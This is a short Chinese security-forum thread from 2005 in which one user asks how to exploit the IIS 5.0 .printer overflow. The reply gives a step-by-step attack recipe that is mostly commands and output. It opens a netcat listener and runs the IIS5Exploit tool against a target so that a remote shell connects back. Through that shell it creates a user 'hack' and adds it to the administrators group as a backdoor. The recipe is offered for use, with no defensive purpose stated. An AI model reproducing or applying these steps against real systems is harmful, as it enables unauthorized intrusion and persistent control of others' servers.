论坛: 菜鸟乐园 标题: IIS5.0NULL.PrinterExploit如何溢出 复制本贴地址    
作者: lu_wakin [lu_wakin]    论坛用户   登录
IIS5.0 NULL.Printer Exploit 如何溢出

地主 发表时间: 05-02-19 15:38

回复: bluehacker [bluehacker]   论坛用户   登录
        小榕写的exploit:IIS5Exploit可用。
  适用于IIS5.0 英文版,详细情况请参见说明
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、运行IIS5Exploit
D:\> IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001.  http://www.netXeyes.com===  

Connecting 211.152.188.1 ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
其中211.152.188.1指向本地IP。
稍等片刻,如果成功在本机NC舰艇的端口出现:
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如:
C:\>net user hack password /add
The command completed successfully.
C:\>net localgroup administrartors hack /add
The command completed successfully.

这样就创建了一个属于Administrator组的用户Hack,密码为password

 


[此贴被 bluehacker(bluehacker) 在 02月19日16时14分 编辑过]


[此贴被 bluehacker(bluehacker) 在 02月19日16时15分 编辑过]

B1层 发表时间: 05-02-19 16:11

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号